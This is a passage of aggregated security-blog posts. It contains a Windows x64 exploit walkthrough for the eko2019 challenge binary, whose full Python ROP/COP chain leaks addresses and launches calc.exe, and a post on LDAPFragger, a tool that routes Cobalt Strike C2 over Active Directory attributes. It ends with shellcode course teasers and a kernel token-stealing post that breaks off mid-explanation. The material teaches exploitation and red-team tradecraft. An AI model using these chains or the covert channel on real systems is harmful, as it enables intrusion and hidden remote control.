After some trial and error, I finally came to a pretty neat conclusion! We can load RCX with the address of our stack pivot ROP gadget. We can then replace the \x41 byte from earlier (we changed this byte to \x65 in the PEB portion of this exploit) with a \x51 byte!

The \x51 byte is the opcode that corresponds to the push rcx instruction! Pushing RCX will allow us to place our user controlled value of RCX (which will hold the address of a stack pivot ROP gadget) onto the stack. Pushing an item onto the stack places it at the top of the stack, right where RSP points! This means that we can place our own ROP gadget at the location RSP points to, and the ret instruction that leaves the function will then execute our ROP gadget! The first step for us is to find a ROP gadget! We will use rp++ to enumerate all ROP gadgets from eko2019.exe.

After running rp++, we find an ideal ROP gadget that will perform the stack pivot.

This gadget will raise the value of RSP, so that RSP (and the bytes after it) point into our user controlled data on the stack! Notice how each gadget does not show the full virtual address of the pointer. This is because of ASLR! If we look at the last 4 or so bytes, we can see that this is actually the offset from the base virtual address of eko2019.exe to said pointer. In this case, the ROP gadget we are going after is located at eko2019.exe + 0x158b.

Let’s update our proof of concept with the stack pivot implemented.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 2nd stage

# 16 total bytes
print "[+] Sending the second header..."
exploit_2 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_2 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_2 += "\x90"

# Padding to loading PEB+0x10 into rcx
exploit_2 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_2 += struct.pack('<Q', peb_addr+0x10)

# Message needs to be 528 bytes total
exploit_2 += "\x41" * (544-len(exploit_2))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_2)

# Indexing the response to view RAX (Base VA of eko2019.exe)
receive_2 = s.recv(1024)
base_va_unpack = struct.unpack_from('<Q', receive_2)
base_address = base_va_unpack[0]

print "[+] The base address for eko2019.exe is located at: {0}".format(hex(base_address))

# Closing the connection
s.close()

# Allow buffer room
sleep(2)

# 3rd stage

print "[+] Sending the third header..."
exploit_3 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_3 += "\x41" * 512

# Just want a vanilla mov rax, qword ptr[rcx], which already exists- so sliding in with a NOP to this instruction
exploit_3 += "\x90"

# Padding to load eko2019.exe+0x9010
exploit_3 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_3 += struct.pack('<Q', base_address+0x9010)

# Message needs to be 528 bytes total
exploit_3 += "\x41" * (544-len(exploit_3))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_3)

# Indexing the response to view RAX (VA of kernel32!WinExec)
receive_3 = s.recv(1024)
kernel32_unpack = struct.unpack_from('<Q', receive_3)
kernel32_winexec = kernel32_unpack[0]

print "[+] kernel32!WinExec is located at: {0}".format(hex(kernel32_winexec))

# Close the connection
s.close()

# 4th stage

# 16 total bytes
print "[+] Sending the fourth header..."
exploit_4 = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 byte offset to the byte we control
exploit_4 += "\x41" * 512

# push rcx (which we control)
exploit_4 += "\x51"

# Padding to load eko2019.exe+0x158b
exploit_4 += "\x41\x41\x41\x41\x41\x41\x41"
exploit_4 += struct.pack('<Q', base_address+0x158b)

# Message needs to be 528 bytes total
exploit_4 += "\x41" * (544-len(exploit_4))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit_4)

print "[+] Pivoted to the stack!"

# Don't need to index any data back through our read primitive, as we just want to stack pivot here
# Receiving data back from a connection is always best practice
s.recv(1024)

# Close the connection
s.close()

After executing the updated proof of concept, we continue execution to our move instruction as always. This time, we land on our intended push rcx instruction after executing the first two requests!

In addition, we can see RCX contains our specified ROP gadget!

After stepping through the push rcx instruction, we can see our ROP gadget gets loaded into RSP!

The next move instruction doesn’t matter to us at this point- as we are only worried about returning to the stack.

After we execute our ret to exit this function, we can clearly see that we have returned into our specified ROP gadget!

After we add to the value of RSP, we can see that when this ROP gadget returns- it will return into a region of memory that we control on the stack. We can view this via the Call stack in WinDbg.

Now that we have been able to successfully pivot back to the stack, it is time to attempt to pop calc.exe. Let’s start executing some useful ROP gadgets!

Recall that since we are working with the x64 architecture, we have to adhere to the __fastcall calling convention. As mentioned before, the registers we will use are:

  1. RCX -> First argument
  2. RDX -> Second argument
  3. R8 -> Third argument
  4. R9 -> Fourth argument
  5. RSP + 0x20 -> Fifth argument
  6. RSP + 0x28 -> Sixth argument
  7. etc.

A call to WinExec() is broken down as follows, according to its documentation.

UINT WinExec(
  LPCSTR lpCmdLine,
  UINT   uCmdShow
);

This means that all we need to do is place a value in RCX and RDX, as this function only takes two arguments.

Since we want to pop calc.exe, the first argument in this function should be a POINTER to an address that contains the string “calc”, which should be null terminated. This should be stored in RCX. lpCmdLine (the argument we are fulfilling) is the name of the application we would like to execute. Remember, this should be a pointer to the string.

The second argument, stored in RDX, is uCmdShow. These are the “display options”. The easiest option here is to use SW_SHOWNORMAL, which just executes and displays the application normally. This means we will just need to place the value 0x1 into RDX, which represents SW_SHOWNORMAL.

Note- you can find all of these ROP gadgets from running rp++.

To start our ROP chain, we will just implement a “ROP NOP”, which will simply return to the stack. This gadget is located at eko2019.exe+0x10a1.

exploit_4 += struct.pack('<Q', base_address+0x10a1)			# ret: eko2019.exe

The next thing we would like to do, is get a pointer to the string “calc” into RCX. In order to do this, we are going to need to have write permissions to a memory address. Then, using a ROP gadget, we can overwrite what this address points to with our own value of “calc”, which is null terminated. Looking in IDA, we see only one of the sections that make up our executable has write permissions.

This means that we need to pick an address from the .data section within eko2019.exe to overwrite. The address we will use is eko2019.exe+0xC288- as it is the first available “blank” address.

We will place this address into RCX, via the following ROP/COP gadgets:

exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe

In this program, there was only one ROP gadget that allowed us to control RCX in the manner we wished- which was mov rcx, rax ; call r12. Obviously, this gadget will not return to the stack like a ROP gadget- but it will call a register afterwards. This is what is known as “Call-Oriented Programming”, or COP. You may be asking “this address will not return to the stack- how will we keep executing”? There is an explanation for this!

Essentially, before we use the COP gadget, we can pop a ROP gadget into the register that will be called (e.g. R12 in this case). Then, when the COP gadget is executed and the register is called, it will actually be performing a call to a ROP gadget we specify- which will be a return back to the stack in this case, via an add rsp, X instruction. Here is how this looks in totality.

# The next gadget is a COP gadget that does not return, but calls r12
# Placing an add rsp, 0x10 gadget to act as a "return" to the stack into r12
exploit_4 += struct.pack('<Q', base_address+0x4a8e)			# pop r12 ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0x8789)			# add rsp, 0x10 ; ret: eko2019.exe 

# Grabbing a blank address in eko2019.exe to write our calc string to and create a pointer (COP gadget)
# The blank address should come from the .data section, as IDA has shown this the only segment of the executable that is writeable
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += struct.pack('<Q', base_address+0xc288)			# First empty address in eko2019.exe .data section
exploit_4 += struct.pack('<Q', base_address+0x6375)			# mov rcx, rax ; call r12: eko2019.exe
exploit_4 += struct.pack('<Q', 0x4141414141414141)			# Padding from add rsp, 0x10

Great! This sequence will load a writeable address into the RCX register. The task now is to somehow overwrite what this address points to.

We stumble across another interesting ROP gadget that can help us achieve this goal!

mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret

This ROP gadget is from kernel32.dll. As you can recall, WinExec() is exported by kernel32.dll. This means we already have a valid address within kernel32.dll. Knowing this, we can find the distance between WinExec() and the base of kernel32.dll- which would allow us to dynamically resolve the base virtual address of kernel32.dll.

kernel32_base = kernel32_winexec-0x5e390

WinExec() is 0x5e390 bytes into kernel32.dll (on this version of Windows 10). Subtracting this value will give us the base address of kernel32.dll! Now that we have resolved the base, we can dynamically calculate the offset and virtual memory address of our gadget in kernel32.dll.

Looking back at our ROP gadget- this gives us the ability to take the value in RAX and move it into the location POINTED TO by RCX. RCX already contains the address we would like to overwrite- so this is a perfect match! All we need to do now is load the string “calc” (null terminated) into RAX! Here is what this looks like all put together.

# Creating a pointer to calc string
exploit_4 += struct.pack('<Q', base_address+0x1167)			# pop rax ; ret: eko2019.exe
exploit_4 += "calc\x00\x00\x00\x00"					# calc (with null terminator)
exploit_4 += struct.pack('<Q', kernel32_base+0x6130f)		        # mov qword [rcx], rax ; mov eax, 0x00000001 ; add rsp, 0x0000000000000080 ; pop rbx ; ret: kernel32.dll

# Padding for add rsp, 0x0000000000000080 and pop rbx
exploit_4 += "\x41" * 0x88

One thing to keep in mind is that the ROP gadget that creates the pointer to “calc” (null terminated) has a few extra instructions on the end that we need to compensate for.

The second parameter is much more straightforward. In kernel32.dll, we found another gadget that allows us to pop our own value into RDX.

# Placing second parameter into rdx
exploit_4 += struct.pack('<Q', kernel32_base+0x19daa)		# pop rdx ; add eax, 0x15FF0006 ; ret: kernel32.dll
exploit_4 += struct.pack('<Q', 0x01)			        # SW_SHOWNORMAL

Perfect! At this point, all we need to do is place the call to WinExec() on the stack! This is done with the following snippet of code.

# Calling kernel32!WinExec
exploit_4 += struct.pack('<Q', base_address+0x10a1)		# ret: eko2019.exe (ROP NOP)
exploit_4 += struct.pack('<Q', kernel32_winexec)	        # Address of kernel32!WinExec

In addition, we need to return to a valid address on the stack after the call to WinExec() so our program doesn’t crash after calc.exe is called. This is outlined below.

exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x89b6)			# add rsp, 0x48 ; ret: eko2019.exe
exploit_4 += "\x41" * 0x48 						# Padding to reach next ROP gadget
exploit_4 += struct.pack('<Q', base_address+0x2e71)			# add rsp, 0x38 ; ret: eko2019.exe

The final exploit code can be found here on my GitHub.

Let’s step through this final exploit in WinDbg to see how things break down.

We have already shown that our stack pivot was successful. After the pivot back to the stack and our ROP NOP which just returns back to the stack is executed, we can see that our pop r12 instruction has been hit. This will load a ROP gadget into R12 that will return to the stack- due to the fact our main ROP gadget calls R12, as explained earlier.

After we step through the instruction, we can see our ROP gadget for returning back to the stack has been loaded into R12.

We hit our next gadget, which pops the writeable address in the .data section of eko2019.exe into RAX. This value will be eventually placed into the RCX register- where the first function argument for WinExec() needs to be.

RAX now contains the blank, writeable address in the .data section.

After this gadget returns, we hit our main gadget of mov rcx, rax ; call r12.

The value of RAX is then placed into RCX. After this occurs, we can see that R12 is called and is going to execute our return back to the stack, add rsp, 0x10 ; ret.

Perfect! Our COP gadget and ROP gadgets worked together to load our intended address into RCX.

Next, we execute our pop rax gadget, which loads the value of “calc” (null terminated) into RAX. 0x636c6163 reads as “clac” when converted from hex to text; this is because we are compensating for the endianness of our processor (little endian).
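
A quick illustration of why the bytes appear “reversed” (again, not part of the exploit itself):

import struct

# "calc" followed by four null bytes, read as a little-endian QWORD
value = struct.unpack('<Q', b"calc\x00\x00\x00\x00")[0]

print(hex(value))   # 0x636c6163 - the hex pairs read back as "clac"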

We land on our most important ROP gadget to date after the return from the above gadget. This will take the string “calc” (null terminated) and write it to the address contained in RCX.

The address in RCX now points to the null terminated string “calc”.

Perfect! All we have to do now, is pop 0x1 into RDX- which has been completed by the subsequent ROP gadget.

Perfect! We have now landed on the call to WinExec()- and we can execute our shellcode!

All that is left to do now, is let everything run as intended!

Let’s run the final exploit.

Calc.exe FTW!

Big shoutout to Blue Frost Security for this binary- this was a very challenging experience and I feel I learned a lot from it. A big shout out as well to my friend @trickster012 for helping me with some of the problems I was having with __fastcall initially. Please contact me with any comments, questions, or corrections.

Peace, love, and positivity :-)

SLAE – Assignment #5: Metasploit Shellcode Analysis

By: voidsec
26 March 2020 at 13:52

Assignment #5: Metasploit Shellcode Analysis The fifth SLAE assignment requires dissecting and analysing three different Linux x86 Metasploit payloads. Metasploit currently has 35 different payloads, but almost half of them are Meterpreter versions, meaning staged payloads. I’ve therefore decided to skip Meterpreter payloads as they involve multiple stages and higher complexity that will break […]

The post SLAE – Assignment #5: Metasploit Shellcode Analysis appeared first on VoidSec.

LDAPFragger: Command and Control over LDAP attributes

19 March 2020 at 10:15

Written by Rindert Kramer

Introduction

A while back during a penetration test of an internal network, we encountered physically segmented networks. These networks contained workstations joined to the same Active Directory domain; however, only one network segment could connect to the internet. To control workstations in both segments remotely with Cobalt Strike, we built a tool that uses the shared Active Directory component to build a communication channel. For this, it uses the LDAP protocol, which is commonly used to manage Active Directory, effectively routing beacon data over LDAP. This blogpost will go into detail about the development process and how the tool works, and provides mitigation advice.

Scenario

A couple of months ago, we did a network penetration test at one of our clients. This client had multiple networks that were completely firewalled, so there was no direct connection possible between these network segments. Because of cost/workload efficiency reasons, the client chose to use the same Active Directory domain between those network segments. This is what it looked like from a high-level overview.

We had physical access to workstations in both segment A and segment B. In this example, workstations in segment A were able to reach the internet, while workstations in segment B could not. While we had physical access to workstations in both network segments, we wanted to control workstations in network segment B from the internet.

Active Directory as a shared component

Both network segments were able to connect to domain controllers in the same domain and could interact with objects, authenticate users, query information and more. In Active Directory, user accounts are objects to which extra information can be added. This information is stored in attributes. By default, user accounts have write permissions on some of these attributes. For example, users can update personal information such as telephone numbers or office locations for their own account. No special privileges are needed for this, since this information is writable for the identity SELF, which is the account itself. This is configured in the Active Directory schema, as can be seen in the screenshot below.

2

Personal information, such as a telephone number or street address, is by default readable for every authenticated user in the forest. Below is a screenshot that displays the permissions for public information for the Authenticated Users identity.

3

The permissions set in the screenshot above provide access to the attributes defined in the Personal-Information property set. This property set contains 40+ attributes that users can read from and write to. The complete list of attributes can be found in the following article: https://docs.microsoft.com/en-us/windows/win32/adschema/r-personal-information
By default, every user that has successfully been authenticated within the same forest is an ‘authenticated user’. This means we can use Active Directory as a temporary data store and exchange data between the two isolated networks by writing the data to these attributes and then reading the data from the other segment.
If we have access to a user account, we can use that user account in both network segments simultaneously to exchange data over Active Directory. This will work, regardless of the security settings of the workstation, since the account will communicate directly to the domain controller instead of the workstation.

To route data over LDAP, we first need code execution privileges on workstations in both segments. How to achieve this, however, is left to the reader and is beyond the scope of this blogpost.
To route data over LDAP, we would write data into one of the attributes and read the data from the other network segment.
In a typical scenario where we want to execute ipconfig on a workstation in network segment B from a workstation in network segment A, we would write the ipconfig command into an attribute, read that command from network segment B, execute it and write the results back into the attribute.

This process is visualized in the following overview:

4

A sample script to utilize this can be found on our GitHub page: https://github.com/fox-it/LDAPFragger/blob/master/LDAPChannel.ps1
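
For illustration, a rough Python equivalent of that write/read exchange might look like the following (a sketch only, assuming the third-party ldap3 package; the server name, DN, and credentials are placeholders):

from ldap3 import Server, Connection, NTLM, MODIFY_REPLACE

# Placeholder environment details - both segments talk to the same AD domain
server = Server('dc01.corp.local')
conn = Connection(server, user='CORP\\alice', password='...', authentication=NTLM, auto_bind=True)
user_dn = 'CN=alice,CN=Users,DC=corp,DC=local'

# Segment A: write the command into the info attribute
conn.modify(user_dn, {'info': [(MODIFY_REPLACE, ['ipconfig'])]})

# Segment B: read the command back from the same attribute and execute it
conn.search(user_dn, '(objectClass=user)', attributes=['info'])
print(conn.entries[0].info.value)   # 'ipconfig'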

While this works in practice to communicate between segmented networks over Active Directory, this solution is not ideal. For example, this channel depends on the replication of data between domain controllers. If you write a message to domain controller A, but read the message from domain controller B, you might have to wait for the domain controllers to replicate in order to get the data. In addition, in the example above we used the info-attribute to exchange data over Active Directory. This attribute can hold up to 1024 bytes of information. But what if the payload exceeds that size? Issues like these made this solution not an ideal one.

Lastly, people already built some proof of concepts doing the exact same thing. Harmj0y wrote an excellent blogpost about this technique: https://www.harmj0y.net/blog/powershell/command-and-control-using-active-directory/

That is why we decided to build an advanced LDAP communication channel that fixes these issues.

Building an advanced LDAP channel

In the example above, the info-attribute is used. This is not an ideal solution, because what if the attribute already contains data or if the data ends up in a GUI somewhere?

To find other attributes, all attributes from the Active Directory schema are queried, and for each attribute the tool checks:

  • whether the attribute already contains data;
  • whether the user has write permissions on it;
  • whether the contents can be cleared.

If this all checks out, the name and the maximum length of the attribute is stored in an array for later usage.

Visually, the process flow would look like this:

5

As for (payload) data not ending up somewhere in a GUI such as an address book, we did not find a reliable way to detect whether an attribute ends up in a GUI or not, so attributes such as telephoneNumber are added to an in-code blacklist. For now, the attribute with the highest maximum length is selected from the array with suitable attributes, for speed and efficiency purposes. We refer to this attribute as the ‘data-attribute’ for the rest of this blogpost.

Sharing the attribute name
Now that we selected the data-attribute, we need to find a way to share the name of this attribute from the sending network segment to the receiving side. As we want the LDAP channel to be as stealthy as possible, we did not want to share the name of the chosen attribute directly.

In order to overcome this hurdle we decided to use hashing. As mentioned, all attributes were queried in order to select a suitable attribute to exchange data over LDAP. These attributes are stored in a hashtable, together with the CRC representation of the attribute name. If this is done in both network segments, we can share the hash instead of the attribute name, since the hash will resolve to the actual name of the attribute, regardless where the tool is used in the domain.
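
A minimal sketch of that idea (hypothetical Python- the CRC variant and hash formatting are assumptions, not necessarily what LDAPFragger itself implements):

import binascii

# Suitable attributes found during the schema enumeration step
attributes = ['info', 'wWWHomePage', 'postalAddress']

# Both clients independently build the same hash -> attribute name lookup table
lookup = {format(binascii.crc32(name.encode()), '08x'): name for name in attributes}

# Only the hash is shared over LDAP; the receiving side resolves it locally
shared_hash = format(binascii.crc32(b'info'), '08x')
print(lookup[shared_hash])   # 'info'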

Avoiding replication issues
Chances are that the transfer rate of the LDAP channel is higher than the replication occurrence between domain controllers. The easy fix for this is to communicate to the same domain controller.
That means that one of the clients has to select a domain controller and communicate the name of the domain controller to the other client over LDAP.

The way this is done is the same as with sharing the name of the data-attribute. When the tool is started, all domain controllers are queried and stored in a hashtable, together with the CRC representation of the fully qualified domain name (FQDN) of the domain controller. The hash of the domain controller that has been selected is shared with the other client and resolved to the actual FQDN of the domain controller.

Initially sharing data
We now have an attribute to exchange data, we can share the name of the attribute in an obfuscated way and we can avoid replication issues by communicating to the same domain controller. All this information needs to be shared before communication can take place.
Obviously, we cannot share this information if the attribute to exchange data with has not been communicated yet (sort of a chicken-egg problem).

The solution for this is to make use of some old attributes that can act as a placeholder. For the tool, we chose to make use of one of the following attributes:

  • primaryInternationalISDNNumber;
  • otherFacsimileTelephoneNumber;
  • primaryTelexNumber.

These attributes are part of the Personal-Information property set, and have been part of that since Windows 2000 Server. One of these attributes is selected at random to store the initial data.
We figured that the chance that people will actually use these attributes is low, but time will tell if that is really the case 😉

Message feedback
If we send a message over LDAP, we do not know if the message has been received correctly and if the integrity has been maintained during the transmission. To know if a message has been received correctly, another attribute will be selected – in the exact same way as the data-attribute – that is used to exchange information regarding that message. In this attribute, a CRC checksum is stored and used to verify if the correct message has been received.

In order to send a message between the two clients – Alice and Bob – Alice first calculates the CRC value of the message she is about to send, before sending it over to Bob over LDAP. After she has sent it to Bob, Alice monitors Bob’s CRC attribute to see if it contains data. If it does, Alice verifies whether that data matches the CRC value she calculated herself. If it is a match, Alice knows that the message has been received correctly.
If it does not match, Alice will wait up until 1 second in 100 millisecond intervals for Bob to post the correct CRC value.
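
In rough Python terms, the sending side behaves something like the following (a hypothetical sketch; write_attribute and read_attribute stand in for the LDAP writes and reads shown earlier):

import time
import binascii

def send_with_feedback(message, write_attribute, read_attribute):
    expected_crc = format(binascii.crc32(message.encode()), '08x')
    write_attribute('data', message)            # write the message into the data-attribute

    # Poll Bob's CRC attribute for up to 1 second, in 100 millisecond intervals
    for _ in range(10):
        if read_attribute('crc') == expected_crc:
            return True                         # message received correctly
        time.sleep(0.1)
    return False                                # no (or wrong) acknowledgement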

6

The process on the receiving end is much simpler. After a new message has been received, the CRC is calculated and written to the CRC attribute after which the message will be processed.

7

Fragmentation
Another challenge that we needed to overcome is that the maximum length of the attribute will probably be smaller than the length of the message that is going to be sent over LDAP. Therefore, messages that exceed the maximum length of the attribute need to be fragmented.
The message itself contains the actual data, number of parts and a message ID for tracking purposes. This is encoded into a base64 string, which will add an additional 33% overhead.
The message is then fragmented into fragments that would fit into the attribute, but for that we need to know how much information we can store into said attribute.
Every attribute has a different maximum length, which can be looked up in the Active Directory schema. The screenshot below displays the maximum length of the info-attribute, which is 1024.

8

At the start of the tool, attribute information such as the name and the maximum length of the attribute is saved. The maximum length of the attribute is used to fragment messages into the correct size, which will fit into the attribute. If the maximum length of the data-attribute is 1024 bytes, a message of 1536 will be fragmented into a message of 1024 bytes and a message of 512 bytes.
After all fragments have been received, the fragments are put back into the original message. By also using CRC, we can send big files over LDAP. Depending on the maximum length of the data-attribute that has been selected, the transfer speed of the channel can be either slow or okay.
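
As a rough sketch of that fragmentation step (hypothetical code; the real message format also carries the number of parts and a message ID):

import base64

def fragment(message: bytes, max_attribute_length: int):
    # Base64 encoding first (roughly 33% overhead), then split to fit the data-attribute
    encoded = base64.b64encode(message).decode()
    return [encoded[i:i + max_attribute_length]
            for i in range(0, len(encoded), max_attribute_length)]

def reassemble(fragments):
    return base64.b64decode(''.join(fragments))

chunks = fragment(b'A' * 1536, 1024)
print([len(c) for c in chunks])   # [1024, 1024] - 1536 bytes grow to 2048 characters after base64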

Autodiscover
The working of the LDAP channel depends on (user) accounts. Preferably, accounts should not be statically configured, so we needed a way for both clients to find each other independently.
Our ultimate goal was to route a Cobalt Strike beacon over LDAP. Cobalt Strike has an experimental C2 interface that can be used to create your own transport channel. The external C2 server will create an injectable DLL payload upon request; once injected into a process, this payload starts a named pipe server. The name of the pipe as well as the architecture can be configured. More information about this can be read at the following location: https://www.cobaltstrike.com/help-externalc2

Until now, we have gathered the following information:

  • 8 bytes – Hash of data-attribute
  • 8 bytes – Hash of CRC-attribute
  • 8 bytes – Hash of domain controller FQDN

Since the name of the pipe as well as the architecture are configurable, we need more information:

  • 8 bytes – Hash of the system architecture
  • 8 bytes – Pipe name

The hash of the system architecture is collected in the same way as the data, CRC and domain controller attribute. The name of the pipe is a randomized string of eight characters. All this information is concatenated into a string and posted into one of the placeholder attributes that we defined earlier:

  • primaryInternationalISDNNumber;
  • otherFacsimileTelephoneNumber;
  • primaryTelexNumber.

The tool will query the Active Directory domain for accounts where one of these attributes contains data. If found and parsed successfully, both clients have not only found each other, but also know which domain controller is used in the process, which attribute will contain the data, which attribute will contain the CRC checksums of the data that was received, and the additional parameters needed to create a payload with Cobalt Strike’s external C2 listener. After this process, the information is removed from the placeholder attribute.
Until now, we have not made a distinction between clients. In order to make use of Cobalt Strike, you need a workstation that is allowed to create outbound connections. This workstation can be used to act as an implant to route the traffic over LDAP to another workstation that is not allowed to create outbound connections. Visually, it would look something like this.

9

Let us say that we have our tool running in segment A and segment B – Alice and Bob. All information that is needed to communicate over LDAP and to generate a payload with Cobalt Strike is already shared between Alice and Bob. Alice will forward this information to Cobalt Strike and will receive a custom payload that she will transfer to Bob over LDAP. After Bob has received the payload, Bob will start a new suspended child process and inject the payload into it, after which the named pipe server will start. Bob then connects to the named pipe server and sends all data from the pipe server over LDAP to Alice, who in turn will forward it to Cobalt Strike. Data from Cobalt Strike is sent to Alice, which she will forward to Bob over LDAP, and this process will continue until the named pipe server is terminated or one of the systems becomes unavailable for whatever reason. To visualize this in a nice process flow, we used the excellent format provided in the external C2 specification document.

10

After a new SMB beacon has been spawned in Cobalt Strike, you can interact with it just as you would normally do. For example, you can run MimiKatz to dump credentials, browse the local hard drive or start a VNC stream.
The tool has been made open source. The source code can be found here: https://github.com/fox-it/LDAPFragger

11

The tool is easy to use: Specifying the cshost and csport parameter will result in the tool acting as the proxy that will route data from and to Cobalt Strike. Specifying AD credentials is not necessary if integrated AD authentication is used. More information can be found on the Github page. Please do note that the default Cobalt Strike payload will get caught by modern AVs. Bypassing AVs is beyond the scope of this blogpost.

Why a C2 LDAP channel?

This solution is ideal in a situation where network segments are completely segmented and firewalled but still share the same Active Directory domain. With this channel, you can still create a reliable backdoor channel to parts of the internal network that are otherwise unreachable for other networks, if you manage to get code execution privileges on systems in those networks. Depending on the chosen attribute, speeds can be okay but still inferior to the good old reverse HTTPS channel. Furthermore, no special privileges are needed and it is hard to detect.

Remediation

In order to detect an LDAP channel like this, it would be necessary to have a baseline identified first. That means that you need to know how much traffic is considered normal, the type of traffic, et cetera. After this information has been identified, then you can filter out the anomalies, such as:

Monitoring the usage of the three static placeholders mentioned earlier in this blogpost might seem like a good tactic as well; however, that would be symptom-based prevention, as it is easy for an attacker to switch to different attributes, rendering that remediation tactic ineffective.

SLAE – Assignment #4: Custom shellcode encoder

By: voidsec
17 March 2020 at 11:08

Assignment #4: Custom Shellcode Encoder As the 4th SLAE’s assignment I was required to build a custom shellcode encoder for the execve payload, which I did, here how. Encoder Implementations I’ve decided to not relay on XORing functionalities as most antivirus solutions are now well aware of this encoding schema, the same reason for which […]

The post SLAE – Assignment #4: Custom shellcode encoder appeared first on VoidSec.

Perform a Nessus scan via port forwarding rules only

By: voidsec
13 March 2020 at 09:34

This post will be a bit different from the usual technical stuff, mostly because I was not able to find any reliable solution on Internet and I would like to help other people having the same doubt/question, it’s nothing advanced, it’s just something useful that I didn’t see posted before. During a recent engagement I […]

The post Perform a Nessus scan via port forwarding rules only appeared first on VoidSec.

SLAE – Assignment #3: Egghunter

By: voidsec
20 February 2020 at 15:25

Assignment #3: Egghunter This time the assignment was very interesting, here the requirements: study an egg hunting shellcode and create a working demo, it should be configurable for different payloads. As many before me, I’ve started my research journey with Skape’s papers: “Searching Process Virtual Address Space”. I was honestly amazed by the paper content, […]

The post SLAE – Assignment #3: Egghunter appeared first on VoidSec.

Exploit Development: Panic! At The Kernel - Token Stealing Payloads Revisited on Windows 10 x64 and Bypassing SMEP

1 February 2020 at 00:00

Introduction

Same ol’ story with this blog post- I am continuing to expand my research/overall knowledge on Windows kernel exploitation, in addition to garnering more experience with exploit development in general. Previously I have talked about a couple of vulnerability classes on Windows 7 x86, which is an OS with minimal protections. With this post, I wanted to take a deeper dive into token stealing payloads, which I have previously talked about on x86, and see what differences the x64 architecture may have. In addition, I wanted to try to do a better job of explaining how these payloads work. This post and research also aim to get me more familiar with the x64 architecture, which is far more common in 2020, and with protections such as Supervisor Mode Execution Prevention (SMEP).

Gimme Dem Tokens!

As a part of Windows, there is something known as the SYSTEM process. The SYSTEM process, PID of 4, houses the majority of kernel mode system threads. The threads stored in the SYSTEM process only run in the context of kernel mode. Recall that a process is a “container”, of sorts, for threads. A thread is the actual item within a process that performs the execution of code. You may be asking “How does this help us?”- especially if you did not see my last post. In Windows, each process object, known as _EPROCESS, has something known as an access token. Recall that an object is a dynamically created (configured at runtime) structure. Continuing on, this access token determines the security context of a process or a thread. Since the SYSTEM process houses execution of kernel mode code, it will need to run in a security context that allows it to access the kernel. This would require system or administrative privilege. This is why our goal will be to identify the access token value of the SYSTEM process and copy it to a process that we control, or the process we are using to exploit the system. From there, we can spawn cmd.exe from the now privileged process, which will grant us NT AUTHORITY\SYSTEM privileged code execution.

Identifying the SYSTEM Process Access Token

We will use Windows 10 x64 to outline this overall process. First, boot up WinDbg on your debugger machine and start a kernel debugging session with your debuggee machine (see my post on setting up a debugging environment). In addition, I noticed that on Windows 10 I had to execute the following command on my debugger machine after completing the bcdedit.exe commands from my previous post: bcdedit.exe /dbgsettings serial debugport:1 baudrate:115200

Once that is setup, execute the following command, to dump the active processes:

!process 0 0

This returns a few fields of each process. We are most interested in the “process address”, which has been outlined in the image above at address 0xffffe60284651040. This is the address of the _EPROCESS structure for a specified process (the SYSTEM process in this case). After enumerating the process address, we can enumerate much more detailed information about the process using the _EPROCESS structure.

dt nt!_EPROCESS <Process address>

dt will display information about various variables, data types, etc. As you can see from the image above, various data types of the SYSTEM process’s _EPROCESS structure have been displayed. If you continue down the kd window in WinDbg, you will see the Token field, at an offset of _EPROCESS + 0x358.

What does this mean? That means for each process on Windows, the access token is located at an offset of 0x358 from the process address. We will for sure be using this information later. Before moving on, however, let’s take a look at how a Token is stored.

As you can see from the above image, there is something called _EX_FAST_REF, or an Executive Fast Reference union. The difference between a union and a structure is that a union stores data types at the same memory location (notice there is no difference in the offset of the various fields to the base of an _EX_FAST_REF union as shown in the image below. All of them are at an offset of 0x000). This is what the access token of a process is stored in. Let’s take a closer look.

dt nt!_EX_FAST_REF

